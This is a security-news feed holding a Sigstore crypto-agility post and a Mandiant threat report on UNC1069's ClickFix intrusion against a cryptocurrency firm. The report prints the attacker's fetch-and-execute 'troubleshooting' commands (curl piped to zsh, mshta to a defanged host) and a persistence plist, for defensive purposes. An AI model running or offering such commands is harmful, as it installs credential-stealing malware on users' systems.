<pubDate>Fri, 08 May 2026 23:20:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Software signatures carry an invisible expiration date. The container image or firmware you sign today might be deployed for 20 years, but the cryptographic signature protecting it may become untrustworthy within 10 years. SHA-1 certificates become worthless, weak RSA keys are banned, and quantum computers may crack today’s elliptic curve cryptography. The question isn’t whether our current signatures will fail, but whether we’re prepared for when they do.</p>
<p>Sigstore, an open-source ecosystem for software signing, recognized this challenge early but initially chose security over flexibility by adopting new cryptographic algorithms as older ones became obsolete. By hard coding ECDSA with P-256 curves and SHA-256 throughout its infrastructure, Sigstore avoided the dangerous pitfalls that have plagued other crypto-agile systems. This conservative approach worked well during early adoption, but as Sigstore’s usage grew, the rigidity that once protected it began to restrict its utility.</p>
<p>Over the past two years, Trail of Bits has collaborated with the Sigstore community to systematically address the limitations of aging cryptographic signatures. Our work established a centralized algorithm registry in the Protobuf specifications to serve as a single source of truth. Second, we updated Rekor and Fulcio to accept configurable algorithm restrictions. And finally, we integrated these capabilities into Cosign, allowing users to select their preferred signing algorithm when generating ephemeral keys. We also developed Go implementations of post-quantum algorithms LMS and ML-DSA, demonstrating that the new architecture can accommodate future cryptographic standards. Here is what motivated these changes, what security considerations shaped our approach, and how to use the new functionality.</p>
<h2>Sigstore’s cryptographic constraints</h2>
<p>Sigstore hard codes ECDSA with P-256 curves and SHA-256 throughout most of its ecosystem. This rigidity is a deliberate design choice. From Fulcio certificate issuance to Rekor transparency logs to Cosign workflows, most steps default to this same algorithm. Cryptographic agility has historically led to serious security vulnerabilities, and focusing on a limited set of algorithms reduces the chance of something going wrong.</p>
<p>This conservative approach, however, has created challenges as the ecosystem has matured. Various organizations and users have vastly different requirements that Sigstore’s rigid approach cannot accommodate. Here are some examples:</p>
<ul>
<li><strong>Compliance-driven organizations</strong> might need NIST-standard algorithms to meet regulatory requirements.</li>
<li><strong>Open-source maintainers</strong> may want to sign artifacts without making cryptographic decisions, relying on secure defaults from the public Sigstore instance.</li>
<li><strong>Security-conscious enterprises</strong> may want to deploy internal Sigstore instances using only post-quantum cryptography.</li>
</ul>
<p>Furthermore, software artifacts remain in use for decades, meaning today’s signatures must stay verifiable far into the future, and the cryptographic algorithm used today might not be secure 10 years from now.</p>
<p>These challenges can be addressed only if Sigstore allows for a certain degree of cryptographic agility. The goal is to enable controlled cryptographic flexibility without repeating the security issues that have affected other crypto-agile systems. To address this, the Sigstore community has developed a <a href="https://docs.google.com/document/d/18vTKFvTQdRt3OGz6Qd1xf04o-hugRYSup-1EAOWn7MQ/edit?tab=t.0#heading=h.op2lvfrgiugr">design document</a> outlining how to introduce cryptographic agility while maintaining strong security guarantees.</p>
<h2>The dangers of cryptographic flexibility</h2>
<p>The most infamous example of problems caused by cryptographic flexibility is <a href="https://jwt.io/introduction">the JWT</a> <code>alg:</code> <code>none</code> vulnerability, where some JWT libraries treated tokens signed with the <code>none</code> algorithm as valid tokens, allowing anyone to forge arbitrary tokens and “sign” whatever payload they wanted. Even more subtle is the <a href="https://portswigger.net/web-security/jwt/algorithm-confusion">RSA/HMAC confusion attack in JWT</a>, where a mismatch between what kind of algorithm a server expects and what it receives allows anyone with knowledge of the RSA public key to forge tokens that pass verification.</p>
<p>The fundamental problem in both cases is in-band algorithm signaling, which allows the data to specify how it should be protected. This creates an opportunity for attackers to manipulate the algorithm choice to their advantage. As the cryptographic community has learned through painful experience, cryptographic agility introduces significant complexity, leading to more code and increased potential attack vectors.</p>
<h2>The solution: Controlled cryptographic flexibility</h2>
<p>Instead of allowing users to mix and match any algorithms they want, Sigstore introduced predefined algorithm suites, which are complete packages that specify exactly which cryptographic components work together.</p>
<p>For example, <code>PKIX_ECDSA_P256_SHA_256</code> not only includes the signing algorithm (ECDSA P-256), but also mandates SHA-256 for hashing. A <code>PKIX_ECDSA_P384_SHA_384</code> suite pairs ECDSA P-384 with SHA-384, and <code>PKIX_ED25519</code> uses Ed25519 and SHA-512. Users can choose between these suites, but they can’t create dangerous combinations, such as ECDSA P-384 with MD5.</p>
<p>Critically, the choice of which algorithm to use comes from out-of-band negotiation, meaning it’s determined by configuration or policy, not by the data being signed. This prevents the in-band signaling attacks that have plagued other systems.</p>
<h2>The implementation</h2>
<p>To enable cryptographic agility across the Sigstore ecosystem, we needed to make coordinated changes that would work together seamlessly. Cryptography is used in several places within the Sigstore ecosystem; however, we primarily focused on enabling clients to change the signing algorithm used to sign and verify artifacts, as this would have a significant impact on end users. We tackled this change in three phases.</p>
<h3>Phase 1: Establishing common ground</h3>
<p>We introduced a centralized <a href="https://github.com/sigstore/protobuf-specs/blob/966b43d006e7fc938b30724933af34c8e351f2a1/protos/sigstore_common.proto#L46-L129">algorithm registry</a> in the Protobuf specifications that defines all <a href="https://github.com/sigstore/sigstore/blob/1e63a2159e71d968a5fa46215280103844797ee8/pkg/signature/algorithm_registry.go#L154">allowed algorithms</a> and their details. We also implemented <a href="https://github.com/sigstore/sigstore/blob/1e63a2159e71d968a5fa46215280103844797ee8/pkg/signature/algorithm_registry.go#L238-L298">default mappings</a> from key types to signing algorithms (e.g., ECDSA P-256 keys automatically use ECDSA P-256 + SHA-256), eliminating ambiguity and providing a single source of truth for all Sigstore components.</p>
<h3>Phase 2: Service-level updates</h3>
<p>We updated <a href="https://github.com/sigstore/rekor/pull/1974">Rekor</a> and <a href="https://github.com/sigstore/fulcio/pull/1938">Fulcio</a> with a new <code>--client-signing-algorithms</code> flag that lets deployments specify which algorithms they accept, enabling custom restrictions like Ed25519-only or future post-quantum-only deployments. We also <a href="https://github.com/sigstore/fulcio/pull/1959">fixed Fulcio</a> to use proper hash algorithms for each key type (SHA-384 for ECDSA P-384, etc.) instead of defaulting everything to SHA-256.</p>
<h3>Phase 3: Client integration</h3>
<p>We updated Cosign to support multiple algorithms by <a href="https://github.com/sigstore/cosign/pull/4050">removing hard-coded SHA-256</a> usage and adding a <a href="https://github.com/sigstore/cosign/pull/3497"><code>--signing-algorithm</code></a> flag for generating different ephemeral key types. Currently available in <code>cosign sign-blob</code> and <code>cosign verify-blob</code>, these changes let users bring their own keys of any supported type and easily select their preferred cryptographic algorithm when ephemeral keys are used. Other clients implementing the Sigstore specification can choose which set of algorithms to use, as long as it is a subset of the allowed algorithms listed in the algorithm registry.</p>
<h3>Validation: Proving it works</h3>
<p>To demonstrate the flexibility of our new architecture, we developed HashEdDSA (Ed25519ph) support in both <a href="https://github.com/sigstore/rekor/pull/1945">Rekor</a> and <a href="https://github.com/sigstore/sigstore/pull/1595">the Sigstore Go library</a> and created Go implementations of post-quantum algorithms <a href="https://github.com/trailofbits/lms-go">LMS</a> and <a href="https://github.com/trailofbits/ml-dsa">ML-DSA</a>. This work proved that our modular architecture can accommodate diverse cryptographic algorithms and provides a solid foundation for future additions, including post-quantum cryptography.</p>
<h2>Cryptographic flexibility in action</h2>
<p>Let’s see this cryptographic flexibility in action by setting up a custom Sigstore deployment. We’ll configure a private Rekor instance that accepts only ECDSA P-521 with SHA-512 and RSA-4096 with SHA-256, by using the <code>--client-signing-algorithms</code> flag, demonstrating both algorithm restriction and the new Cosign capabilities.</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">~/rekor$ git diff
</span></span><span class="line"><span class="cl">diff --git a/docker-compose.yml b/docker-compose.yml
</span></span><span class="line"><span class="cl">index 3e5f4c3..93e0d10 <span class="m">100644</span>
</span></span><span class="line"><span class="cl">--- a/docker-compose.yml
</span></span><span class="line"><span class="cl">+++ b/docker-compose.yml
</span></span><span class="line"><span class="cl">@@ -120,6 +120,7 @@ services:
</span></span><span class="line"><span class="cl"> <span class="s2">"--enable_stable_checkpoint"</span>,
</span></span><span class="line"><span class="cl"> <span class="s2">"--search_index.storage_provider=mysql"</span>,
</span></span><span class="line"><span class="cl"> <span class="s2">"--search_index.mysql.dsn=test:zaphod@tcp(mysql:3306)/test"</span>,
</span></span><span class="line"><span class="cl">+ <span class="s2">"--client-signing-algorithms=ecdsa-sha2-512-nistp521,rsa-sign-pkcs1-4096-sha256"</span>,
</span></span><span class="line"><span class="cl"> <span class="c1"># Uncomment this for production logging</span>
</span></span><span class="line"><span class="cl"> <span class="c1"># "--log_type=prod",</span>
</span></span><span class="line"><span class="cl"> <span class="o">]</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">$ docker compose up -d</span></span></code></pre>
</figure>
<p>Let’s create the artifact and use Cosign to sign it:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">$ <span class="nb">echo</span> <span class="s2">"Trail of Bits &amp; Sigstore"</span> &gt; msg.txt
</span></span><span class="line"><span class="cl">$ ./cosign sign-blob --bundle cosign.bundle --signing-algorithm<span class="o">=</span>ecdsa-sha2-512-nistp521 --rekor-url http://localhost:3000 msg.txt
</span></span><span class="line"><span class="cl">Retrieving signed certificate...
</span></span><span class="line"><span class="cl">Successfully verified SCT...
</span></span><span class="line"><span class="cl">Using payload from: msg.txt
</span></span><span class="line"><span class="cl">tlog entry created with index: <span class="m">111111111</span>
</span></span><span class="line"><span class="cl">Wrote bundle to file cosign.bundle
</span></span><span class="line"><span class="cl">qzbCtK4WuQeoeZzGP1111123+...+j7NjAAAAAAAA<span class="o">==</span></span></span></code></pre>
</figure>
<p>This last command performs a few steps:</p>
<ol>
<li>Generates an ephemeral private/public ECDSA P-521 key pair and gets the SHA-512 hash of the artifact (<code>--signing-algorithm=ecdsa-sha2-512-nistp521</code>)</li>
<li>Uses the ECDSA P-521 key to request a certificate to Fulcio</li>
<li>Signs the hash with the certificate</li>
<li>Submits the artifact’s hash, the certificate, and some extra data to our local instance of Rekor (<code>--rekor-url http://localhost:3000</code>)</li>
<li>Saves everything into the <code>cosign.bundle</code> file (<code>--bundle cosign.bundle</code>)</li>
</ol>
<p>We can verify the data in the bundle to ensure ECDSA P-521 was actually used (with the right hash function):</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">$ jq -C <span class="s1">'.messageSignature'</span> cosign.bundle
</span></span><span class="line"><span class="cl"><span class="o">{</span>
</span></span><span class="line"><span class="cl"> <span class="s2">"messageDigest"</span>: <span class="o">{</span>
</span></span><span class="line"><span class="cl"> <span class="s2">"algorithm"</span>: <span class="s2">"SHA2_512"</span>,
</span></span><span class="line"><span class="cl"> <span class="s2">"digest"</span>: <span class="s2">"WIjb9UuEBgdSxhRMoz+Zux4ig8kWY...+65L6VSPCKCtzA=="</span>
</span></span><span class="line"><span class="cl"> <span class="o">}</span>,
</span></span><span class="line"><span class="cl"> <span class="s2">"signature"</span>: <span class="s2">"MIGIAkIBRrn.../zgwlBT6g=="</span>
</span></span><span class="line"><span class="cl"><span class="o">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">$ jq -r <span class="s1">'.verificationMaterial.certificate.rawBytes'</span> cosign.bundle <span class="p">|</span> base64 -d <span class="p">|</span> openssl x509 -text -noout -in /dev/stdin <span class="p">|</span> grep -A <span class="m">6</span> <span class="s2">"Subject Public Key Info"</span>
</span></span><span class="line"><span class="cl"> Subject Public Key Info:
</span></span><span class="line"><span class="cl"> Public Key Algorithm: id-ecPublicKey
</span></span><span class="line"><span class="cl"> Public-Key: <span class="o">(</span><span class="m">521</span> bit<span class="o">)</span>
</span></span><span class="line"><span class="cl"> pub:
</span></span><span class="line"><span class="cl"> 04:01:36:90:6c:d5:53:5f:8d:4b:c6:2a:13:36:69:
</span></span><span class="line"><span class="cl"> 31:54:e3:2d:92:e0:bd:d5:77:35:37:62:cd:6a:4d:
</span></span><span class="line"><span class="cl"> 9f:32:83:97:a7:0d:4e:48:73:fe:3c:a2:0f:f2:3d:</span></span></code></pre>
</figure>
<p>Now let’s try a different key type to see if it’s rejected by Rekor. To generate a different key type, we just need to switch the value of <code>--signing-algorithm</code> in Cosign:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">$ ./cosign sign-blob --bundle cosign.bundle --signing-algorithm<span class="o">=</span>ecdsa-sha2-256-nistp256 --rekor-url http://localhost:3000 msg.txt
</span></span><span class="line"><span class="cl">Generating ephemeral keys...
</span></span><span class="line"><span class="cl">Retrieving signed certificate...
</span></span><span class="line"><span class="cl">Successfully verified SCT...
</span></span><span class="line"><span class="cl">Using payload from: msg.txt
</span></span><span class="line"><span class="cl">Error: signing msg.txt: <span class="o">[</span>POST /api/v1/log/entries<span class="o">][</span>400<span class="o">]</span> createLogEntryBadRequest <span class="o">{</span><span class="s2">"code"</span>:400,<span class="s2">"message"</span>:<span class="s2">"error processing entry: entry algorithms are not allowed"</span><span class="o">}</span>
</span></span><span class="line"><span class="cl">error during <span class="nb">command</span> execution: signing msg.txt: <span class="o">[</span>POST /api/v1/log/entries<span class="o">][</span>400<span class="o">]</span> createLogEntryBadRequest <span class="o">{</span><span class="s2">"code"</span>:400,<span class="s2">"message"</span>:<span class="s2">"error processing entry: entry algorithms are not allowed"</span><span class="o">}</span></span></span></code></pre>
</figure>
<p>As we can see, Rekor did not allow Cosign to save the entry (<code>entry algorithms are not allowed</code>), as <code>ecdsa-sha2-256-nistp256</code> was not part of the list of algorithms allowed through the <code>--client-signing-algorithms</code> flag used when starting the Rekor instance.</p>
<h2>Future-proofing Sigstore</h2>
<p>The changes that Trail of Bits has implemented alongside the Sigstore community allow organizations to use different signing algorithms while maintaining the same security model that made Sigstore successful.</p>
<p>Sigstore now supports algorithm suites from ECDSA P-256 to Ed25519 to RSA variants, with a centralized registry ensuring consistency across deployments. Organizations can configure their instances to accept only specific algorithms, whether for compliance requirements or post-quantum preparation.</p>
<p>The foundation is now in place for future algorithm additions. As cryptographic standards evolve and new algorithms become available, Sigstore can adopt them through the same controlled process we’ve established. Software signatures created today will remain verifiable as the ecosystem adapts to new cryptographic realities.</p>
<p>Want to dig deeper? Check out our <a href="https://github.com/trailofbits/lms-go">LMS</a> and <a href="https://github.com/trailofbits/ml-dsa">ML-DSA</a> Go implementations for post-quantum cryptography, or run <code>--help</code> on Rekor, Fulcio, and Cosign to explore the new algorithm configuration options. If you’re looking to modernize your project’s cryptography to current standards, <a href="https://www.trailofbits.com/services/cryptography">Trail of Bits’ cryptography consulting services</a> can help you get on the right path.</p>
<p>We would like to thank Google, OpenSSF, and Hewlett-Packard for having funded some of this work. Trail of Bits continues to contribute to the Sigstore ecosystem as part of our ongoing commitment to strengthening open-source security infrastructure.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering]]></title>
<description><![CDATA[Written by: Ross Inman, Adrian Hernandez

Introduction
North Korean threat actors continue to evolve their tradecraft to target the cryptocurrency and decentralized finance (DeFi) verticals. Mandiant recently investigated an intrusion targeting a FinTech entity within this sector, attributed to U...]]></description>
<link>https://tsecurity.de/de/3501435/it-security-nachrichten/unc1069-targets-cryptocurrency-sector-with-new-tooling-and-ai-enabled-social-engineering/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501435/it-security-nachrichten/unc1069-targets-cryptocurrency-sector-with-new-tooling-and-ai-enabled-social-engineering/</guid>
<pubDate>Fri, 08 May 2026 23:20:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: <span>Ross Inman, Adrian Hernandez</span></p>
<hr></div>
<div class="block-paragraph_advanced"><h3><span>Introduction</span></h3>
<p><span>North Korean threat actors continue to evolve their tradecraft to target the cryptocurrency and decentralized finance (DeFi) verticals. Mandiant recently investigated an intrusion targeting a FinTech entity within this sector, attributed to </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/threat-actor-usage-of-ai-tools"><span>UNC1069</span></a><span>, a financially motivated threat actor active since at least 2018. This investigation revealed a tailored intrusion resulting in the deployment of seven unique malware families, including a new set of tooling designed to capture host and victim data: SILENCELIFT, DEEPBREATH and CHROMEPUSH. The intrusion relied on a social engineering scheme involving a compromised Telegram account, a fake Zoom meeting, a ClickFix infection vector, and reported usage of AI-generated video to deceive the victim.</span></p>
<p><span>These tactics build upon a shift first documented in the November 2025 publication </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/threat-actor-usage-of-ai-tools"><span>GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools</span></a><span> where Google Threat Intelligence Group (GTIG) identified UNC1069's transition from using AI for simple productivity gains to deploying novel AI-enabled lures in active operations. The volume of tooling deployed on a single host indicates a highly determined effort to harvest credentials, browser data, and session tokens to facilitate financial theft. While UNC1069 typically targets cryptocurrency startups, software developers, and venture capital firms, the deployment of multiple new malware families alongside the known downloader SUGARLOADER marks a significant expansion in their capabilities.</span></p>
<h3><span>Initial Vector and Social Engineering </span></h3>
<p><span>The victim was contacted via Telegram through the account of an executive of a cryptocurrency company that had been compromised by UNC1069. Mandiant identified claims from the true owner of the account, posted from another social media profile, where they had posted a warning to their contacts that their Telegram account had been hijacked; however, Mandiant was not able to verify or establish contact with this executive. UNC1069 engaged the victim and, after building a rapport, sent a Calendly link to schedule a 30-minute meeting. The meeting link itself directed to a spoofed Zoom meeting that was hosted on the threat actor's infrastructure, </span><code>zoom[.]uswe05[.]us</code><span>. </span></p>
<p><span><span><span>The victim reported that during the call, they were presented with a video of a CEO from another cryptocurrency company that appeared to be a deepfake. While Mandiant was unable to recover forensic evidence to independently verify the use of AI models in this specific instance, the reported ruse is similar to a previously publicly reported </span><a href="https://x.com/0xryankim/status/1927630589718573065" rel="noopener" target="_blank"><span>incident</span></a><span> with similar characteristics, where deepfakes were also allegedly used</span>.</span></span></p>
<p><span>Once in the "meeting," the fake video call facilitated a ruse that gave the impression to the end user that they were experiencing audio issues. This was employed by the threat actor to conduct a ClickFix attack: an attack technique where the threat actor directs the user to run troubleshooting commands on their system to address a purported technical issue. The recovered web page provided two sets of commands to be run for "troubleshooting": one for macOS systems, and one for Windows systems. Embedded within the string of commands was a single command that initiated the infection chain. </span></p>
<p><span>Mandiant has observed UNC1069 employing these techniques to target both corporate entities and individuals within the cryptocurrency industry, including software firms and their developers, as well as venture capital firms and their employees or executives. This includes the use of fake Zoom meetings and a known use of AI tools by the threat actor for editing images or videos during the social engineering stage. </span></p>
<p><span>UNC1069 is known to use tools like </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/threat-actor-usage-of-ai-tools"><span>Gemini</span></a><span> to develop tooling, conduct operational research, and assist during the reconnaissance stages, as reported by GTIG. Additionally, Kaspersky recently </span><a href="https://securelist.com/bluenoroff-apt-campaigns-ghostcall-and-ghosthire/117842/" rel="noopener" target="_blank"><span>claimed</span></a><span> Bluenoroff, a threat actor that overlaps with UNC1069, is also using GTP-4o models to modify images indicating adoption of GenAI tools and integration of AI into the adversary lifecycle.</span></p>
<h3><span>Infection Chain </span></h3>
<p><span>In the incident response engagement performed by Mandiant, the victim executed the "troubleshooting" commands provided in Figure 1, which led to the initial infection of the macOS device.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>system_profiler SPAudioData
softwareupdate --evaluate-products --products audio --agree-to-license
curl -A audio -s hxxp://mylingocoin[.]com/audio/fix/6454694440 | zsh
system_profiler SPSoundCardData
softwareupdate --evaluate-products --products soundcard
system_profiler SPSpeechData
softwareupdate --evaluate-products --products speech --agree-to-license</code></pre>
<p><span>Figure 1: Attacker commands shared during the social engineering stage</span></p></div>
<div class="block-paragraph_advanced"><p><span>A set of "troubleshooting" commands that targeted Windows operating systems was also recovered from the fake Zoom call webpage:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>setx audio_volume 100
pnputil /enum-devices /connected /class "Audio"
mshta hxxp://mylingocoin[.]com/audio/fix/6454694440
wmic sounddev get Caption, ProductName, DeviceID, Status
msdt -id AudioPlaybackDiagnostic
exit</code></pre>
<p><span>Figure 2: Attacker commands shared when Windows is detected</span></p></div>
<div class="block-paragraph_advanced"><p><span>Evidence of AppleScript execution was recorded immediately following the start of the infection chain; however, contents of the AppleScript payload could not be recovered from the resident forensic artifacts on the system. Following the AppleScript execution a malicious Mach-O binary was deployed to the system. </span></p>
<p><span>The first malicious executable file deployed to the system was a packed backdoor tracked by Mandiant as WAVESHAPER. WAVESHAPER served as a conduit to deploy a downloader tracked by Mandiant as HYPERCALL as well as subsequent additional tooling to considerably expand the adversary's foothold on the system. </span></p>
<p><span>Mandiant observed three uses of the HYPERCALL downloader during the intrusion: </span></p>
<ol>
<li aria-level="1">
<p role="presentation"><span>Execute a follow-on backdoor component, tracked by Mandiant as HIDDENCALL, which provided hands-on keyboard access to the compromised system</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Deploy another downloader, tracked by Mandiant as SUGARLOADER</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Facilitate the execution of a toehold backdoor, tracked by Mandiant as SILENCELIFT, which beacons system information to a command-and-control (C2 or C&amp;C) server</span></p>
</li>
</ol></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc1069-crypto-ai-fig3a.max-1000x1000.png" alt="Attack chain">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="vbsuh">Figure 3: Attack chain</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>XProtect </span></h3>
<p><a href="https://support.apple.com/en-gb/guide/security/sec469d47bd8/web" rel="noopener" target="_blank"><span>XProtect</span></a><span> is the built-in anti-virus technology included in macOS. Originally relying on signature-based detection only, the XProtect Behavioral Service (XBS) was introduced to implement behavioral-based detection. If a program violates one of the behavioral-based rules, which are defined by Apple, information about the offending program is recorded in the XProtect Database (XPdb), an SQLite 3 database located at </span><code>/var/protected/xprotect/XPdb</code><span>.</span></p>
<p><span>Unlike signature-based detections, behavioral-based detections do not result in XProtect blocking execution or quarantining of the offending program. </span></p>
<p><span>Mandiant recovered the file paths and SHA256 hashes of programs that had violated one or more of the XBS rules from the XPdb. This included information on malicious programs that had been deleted and could not be recovered. As the XPdb also includes a timestamp of the detection, Mandiant could determine the sequence of events associated with malware execution, from the initial infection chain to the next-stage malware deployments, despite no endpoint detection and response (EDR) product being present on the compromised system. </span></p>
<h3><span>Data Harvesting and Persistence</span></h3>
<p><span>Mandiant identified two disparate data miners that were deployed by the threat actor during their access period: DEEPBREATH and CHROMEPUSH. </span></p>
<p><span>DEEPBREATH, a data miner written in Swift, was deployed via HIDDENCALL—the follow-on backdoor component to HYPERCALL. DEEPBREATH manipulates the Transparency, Consent, and Control (TCC) database to gain broad file system access, enabling it to steal:</span></p>
<ol>
<li aria-level="1">
<p role="presentation"><span>Credentials from the user's Keychain</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Browser data from Chrome, Brave, and Edge</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>User data from two different versions of Telegram</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>User data from Apple Notes</span></p>
</li>
</ol>
<p><span>DEEPBREATH stages the targeted data in a temporary folder location and compresses the data into a ZIP archive, which was exfiltrated to a remote server via the curl command-line utility. </span></p>
<p><span>Mandiant also identified HYPERCALL deployed an additional malware loader, tracked as part of the code family SUGARLOADER. A persistence mechanism was installed in the form of a launch daemon for SUGARLOADER, which configured the system to execute the malware during the macOS startup process. The launch daemon was configured through a property list (Plist) file, </span><code>/Library/LaunchDaemons/com.apple.system.updater.plist</code><span>. The contents of the launch daemon Plist file are provided in Figure 4.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"&gt;
&lt;plist version="1.0"&gt;
&lt;dict&gt;
	&lt;key&gt;Label&lt;/key&gt;
	&lt;string&gt;com.apple.system.updater&lt;/string&gt;
	&lt;key&gt;ProgramArguments&lt;/key&gt;
	&lt;array&gt;
	&lt;string&gt;/Library/OSRecovery/SystemUpdater&lt;/string&gt;
	&lt;/array&gt;
	&lt;key&gt;RunAtLoad&lt;/key&gt;
 	&lt;true/&gt;
	&lt;key&gt;KeepAlive&lt;/key&gt;
	&lt;false/&gt;
	&lt;key&gt;ExitTimeOut&lt;/key&gt;
	&lt;integer&gt;10&lt;/integer&gt;
&lt;/dict&gt;
&lt;/plist&gt;</code></pre>
<p><span>Figure 4: Launch daemon Plist configured to execute SUGARLOADER</span></p></div>
<div class="block-paragraph_advanced"><p><span>The SUGARLOADER sample recovered during the investigation did not have any internal functionality for establishing persistence; therefore, Mandiant assesses the launch daemon was created manually via access granted by one of the other malicious programs.</span></p>
<p><span>Mandiant observed SUGARLOADER was solely used to deploy CHROMEPUSH, a data miner written in C++. CHROMEPUSH deployed a browser extension to Google Chrome and Brave browsers that masqueraded as an extension purposed for editing Google Docs offline. CHROMEPUSH additionally possessed the capability to record keystrokes, observe username and password inputs, and extract browser cookies, completing the data harvesting on the host.</span></p>
<h3><span>In the Spotlight: UNC1069</span></h3>
<p><span>UNC1069 is a financially motivated threat actor that is suspected with high confidence to have a North Korea nexus and that has been tracked by Mandiant since 2018. Mandiant has observed this threat actor evolve its tactics, techniques, and procedures (TTPs), tooling, and targeting. Since at least 2023, the group has shifted from spear-phishing techniques and traditional finance (TradFi) targeting towards the Web3 industry, such as centralized exchanges (CEX), software developers at financial institutions, high-technology companies, and individuals at venture capital funds. Notably, while UNC1069 has had a smaller impact on cryptocurrency heists compared to other groups like UNC4899 in 2025, it remains an active threat targeting centralized exchanges and both entities and individuals for financial gain.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc1069-crypto-ai-fig5.max-1000x1000.png" alt="UNC1069 victimology map">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ssdbb">Figure 5: UNC1069 victimology map</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>Mandiant has observed this group active in 2025 targeting the financial services and the cryptocurrency industry in payments, brokerage, staking, and wallet infrastructure verticals. </span></p>
<p><span>While UNC1069 operators have targeted both individuals in the Web3 space and corporate networks in these verticals, UNC1069 and other suspected Democratic People's Republic of Korea (DPRK)-nexus groups have demonstrated the capability to move from personal to corporate devices using different techniques in the past. However, for this particular incident, Mandiant noted an unusually large amount of tooling dropped onto a single host targeting a single individual. This evidence confirms this incident was a targeted attack to harvest as much data as possible for a dual purpose; enabling cryptocurrency theft and fueling future social engineering campaigns by leveraging victim’s identity and data.</span></p>
<p><span>Subsequently, Mandiant identified seven distinct malware families during the forensic analysis of the compromised system, with SUGARLOADER being the only malware family already tracked by Mandiant prior to the investigation.</span></p>
<h3><span>Technical Appendix</span></h3>
<h4><span>WAVESHAPER</span></h4>
<p><span>WAVESHAPER is a backdoor written in C++ and packed by an unknown packer that targets macOS. The backdoor supports downloading and executing arbitrary payloads retrieved from its command-and-control (C2 or C&amp;C) server, which is provided via the command-line parameters. To communicate with the adversary infrastructure, WAVESHAPER leverages the curl library for either HTTP or HTTPS, depending on the command-line argument provided.</span></p>
<p><span>WAVESHAPER also runs as a daemon by forking itself into a child process that runs in the background detached from the parent session and collects the following system information, which is sent to the C&amp;C server in a HTTP POST request:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Random victim UID (16 alphanumeric chars)</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Victim username</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Victim machine name</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>System time zone</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>System boot time using sysctlbyname("kern.boottime")</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Recently installed software</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Hardware model</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>CPU information</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>OS version</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>List of the running processes</span></p>
</li>
</ul>
<p><span>Payloads downloaded from the C&amp;C server are saved to a file system location matching the following regular expression pattern: </span><code>/tmp/\.[A-Za-z0-9]{6}</code><span>.</span></p>
<h4><span>HYPERCALL</span></h4>
<p><span>HYPERCALL is a Go-based downloader designed for macOS that retrieves malicious dynamic libraries from a designated C&amp;C server. The C&amp;C address is extracted from an RC4-encrypted configuration file that must be present on the disk alongside the binary. Once downloaded, the library is reflectively loaded for in-memory execution.</span></p>
<p><span>Mandiant observed recognizable influences from SUGARLOADER in HYPERCALL, despite the new downloader being written in a different language (Golang instead of C++) and having a different development process. These similarities include the use of an external configuration file for the C&amp;C infrastructure, the use of the RC4 algorithm for configuration file decryption, and the capability for reflective library injection.</span></p>
<p><span>Notably, some elements in HYPERCALL appear to be incomplete. For instance, the presence of configuration parameters that are of no use reveals a lack of technical proficiency by some of UNC1069's malware developers compared to other North Korea-nexus threat actors.</span></p>
